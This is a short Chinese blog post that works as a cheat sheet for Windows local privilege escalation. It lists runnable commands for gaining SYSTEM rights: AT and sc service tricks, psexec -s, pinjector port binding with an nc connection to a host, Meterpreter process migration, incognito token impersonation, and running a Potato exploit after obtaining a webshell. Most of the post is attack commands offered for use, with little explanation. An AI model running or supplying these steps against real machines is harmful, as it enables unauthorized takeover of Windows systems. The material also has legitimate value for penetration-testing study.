Windows本地用户提权(一)

本地用户提权

AT命令提权(适用于sever 2003及win7以前)

普通用户在cmd中输入 at 时间 /interactive cmd

到时间后会弹出新的cmd窗口,该窗口的用户权限是system

SC命令提权(适用于sever 2003及以前)

#创建一个名叫syscmd的新的交互式的cmd执行服务

sc Create syscmdabc binPath= "cmd /K start" type= own type= interact

#运行服务

sc start syscmdabc

PStools提权(适用于sever 2008,sever 2012等,部分个人主机不能执行)

下载PStools,再将其中的psexec.exe上传到目标机器

然后在目标机器cmd窗口执行:

psexec.exe -accepteula -s -i -d cmd 

生成的新的cmd窗口权限为system

进程迁移注入提权(适用于servee 2008以前版本)

下载并安装pinjector.exe到目标机器

查看本地运行的进程及权限

pinjector -l

将该进程的权限绑定到本地的一个端口上

pinjector -p 420 cmd 3333

新开一个cmd,使用nc监听本地的该端口:

nc 192.168.46.149 3333

此时的权限为system

msf进程迁移提权(Win2008&2012&2016-阿里云服务器)

目标机器执行msf后门,在msf上线后:

ps //查看进程及权限
migrate PID //迁移对应PID

注意:权限太低无法执行。

令牌窃取提权(Win2008 Win2012 阿里云服务器)

use incognito

list_tokens -u \\查看当前令牌信息

impersonate_token "NT AUTHORITY\SYSTEM(权限信息)"

获取webshell后,过低权限用户利用烂土豆先提权,再令牌窃取

目标机器中有potato.exe,在msf中执行:

execute -cH -f ./potato.exe (当前路径下有potato.exe)

再令牌窃取:

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

msf自动提权

getsystem
posted @ 2023-03-18 15:26  Arongsec  阅读(363)  评论(1)    收藏  举报